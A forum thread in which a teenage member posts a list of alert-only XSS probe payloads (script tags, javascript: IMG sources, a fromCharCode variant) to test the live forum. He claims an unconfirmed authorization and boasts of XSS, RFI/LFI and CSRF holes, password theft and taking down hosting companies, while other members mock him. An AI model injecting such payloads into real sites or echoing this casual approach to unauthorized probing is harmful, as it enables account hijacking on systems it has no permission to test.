Page 1 of 2 12 LastLast
Results 1 to 25 of 40

Thread: XSS nar its jsut my test. ')alert('xss'); ");alert('xss');

  1. #1
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default XSS nar its jsut my test. ')alert('xss'); ");alert('xss');

    <script type=text/javascript>alert("t0pP8uZz")</script>
    <script>alert("t0pP8uZz")</script>;
    <script>alert("t0pP8uZz");</script>
    <script>alert("/t0pP8uZz"/)</script>
    <script>var var = 1; alert(var)</script>

    <IMG SRC="javascript:alert('Vulnerable');">
    <IMG SRC=javascript:alert('Vuln')>
    <IMG SRC=JaVaScRiPt:alert('Vuln')>
    <IMG SRC=javascript:alert("Vuln")>
    <IMG SRC=`javascript:alert("Santa says,
    'vuln'")`>
    <IMG """><SCRIPT>alert("yay for nothin")</SCRIPT>">
    <IMG
    SRC=javascript:alert(String.fromCharCode(88,83,83) )>
    <IMG
    SRC=javascript:alert('tehe')>


    dont delete because i thought it would be more constructive for me to do all my testing in one little thread rather than spamming others.

  2. #2
    Join Date
    Jun 2006
    Posts
    3,861
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Default

    ...WTF are you doing?

  3. #3
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    WTF do you think you're doing

  4. #4
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Hey c0de authorized me to pentest this forum.
    So thats what im doing.
    Just to wipe the smug smile off his stupid gormless features.

    This forum has an XSS vuln and has a RFI/LFI hole in the pm system.

    More updates later.

  5. #5
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    And.. you wanted to tell us why? Thats MY secret hole! :@


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  6. #6
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Just so you are aware.
    XSS needs to be tested by having values stored server side.
    Well XSS that has any good damage does.

    Sadly though those two holes were not discovered by me.
    So that wont please c0de so i will strive to discover more.
    Then if he doesnt believe me or says im a stupid 15 year old again.
    Then i will use these exploits.

    But so he knows.
    The majority of great hackers today are 15-16.

  7. #7
    Join Date
    Aug 2007
    Location
    Hawaii
    Posts
    3,880
    Mentioned
    7 Post(s)
    Quoted
    152 Post(s)

    Default

    Should we clap?
    Faith is an oasis in the heart which will never be reached by the caravan of thinking.

  8. #8
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Yay for CSRF

  9. #9
    Join Date
    Jun 2006
    Location
    Australia
    Posts
    435
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    [spam] http://www.youtube.com/watch?v=a_areBajlhA [/spam]
    yeh maybe we should just hold hands and sigh?
    Part of the Scar/SRL community since may 05'

  10. #10
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Not even gunna bother watching it.

  11. #11
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Please be nice im only testing.

  12. #12
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    Impressive.. not?

  13. #13
    Join Date
    Jun 2006
    Location
    Australia
    Posts
    435
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    ok, sorry. no more shit stiring
    Part of the Scar/SRL community since may 05'

  14. #14
    Join Date
    Feb 2007
    Location
    Het ademt zwaar en moedeloos vannacht.
    Posts
    7,211
    Mentioned
    26 Post(s)
    Quoted
    72 Post(s)

    Default

    Two holes in the PM system, not good Let's hope I don't get hacked.
    Are they in the notification popup and mail?
    Lemme test too yo <- pretty common flaw.

    @Noobs: XSS stands for cross site scripting, some type of security flaw allowing users to add harmful code to a website, such as stuff to hijack sessions and other client side (java)scripts. Actually it should be called CSS, but as there is already a CSS (cascaded style sheets) they just called it XSS.
    Short version: XSS is injecting javascript in websites
    Shortest verision: XSS is dangerous
    I made a new script, check it out!.

  15. #15
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    CSRF is more dangerous.
    I can steal anyone password really.

  16. #16
    Join Date
    Jun 2006
    Posts
    3,861
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Default

    Steal mine and PM it to me

  17. #17
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Yesh, try to take mine And PM it to me..


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  18. #18
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    im testing it as we speak.

  19. #19
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    however my signature seems to not be working

  20. #20
    Join Date
    Sep 2006
    Location
    West U.S.
    Posts
    2,172
    Mentioned
    0 Post(s)
    Quoted
    6 Post(s)

    Default

    you better not touch mine!!!

    They are sisters...
    Runescape Classic

  21. #21
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    This guy just wants post count++ I doubt he can hack this forum- Dankness and Fakawi, and others have put too much work into it.


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  22. #22
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Oh i'm writing a PM to them all as we speak notifying them of the holes i have found.
    Just for the record.
    What i have done is literally hacked this forum.
    I have found several holes that could allow me to do very nasty things.
    But as i like to auto i am gunna be nice and jsut tell admins about it.

  23. #23
    Join Date
    May 2007
    Location
    Finland
    Posts
    41
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by santascar View Post
    Oh i'm writing a PM to them all as we speak notifying them of the holes i have found.
    Just for the record.
    What i have done is literally hacked this forum.
    I have found several holes that could allow me to do very nasty things.
    But as i like to auto i am gunna be nice and jsut tell admins about it.
    a good thing to do in my opinion. but id like to hear one of them admins prove you sent a pm

  24. #24
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    lol?
    Well im not only gunna PM them.
    Im also gunna attach a post to the back of the thread where i was ridiculed.
    So much to the point that "Your jsut a stupid 15 year old who can not hack anything!"
    This tears me in half that he is such an idiot.
    The best hacked i know.
    RoMe0
    Is one year older than me.
    And me adn him together have taken down hosting companies that gives us access to all the sites hosted by them.
    Now is that not hacking?

  25. #25
    Join Date
    Jun 2007
    Location
    Minnesota
    Posts
    773
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Why do you feel the need to prove yourself so much?

Page 1 of 2 12 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Scripting Noob Alert!
    By noodlesalan in forum OSR Help
    Replies: 6
    Last Post: 10-17-2008, 11:48 PM
  2. Slappage alert!
    By The Prince of Randomness? in forum News and General
    Replies: 8
    Last Post: 10-11-2007, 05:13 AM
  3. Low HP + Random Alert
    By riskbling in forum RS3 Outdated / Broken Scripts
    Replies: 6
    Last Post: 08-10-2007, 03:20 AM
  4. Low Hp & Random Alert - Via sound -
    By blind in forum RS3 Outdated / Broken Scripts
    Replies: 6
    Last Post: 08-06-2007, 11:00 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •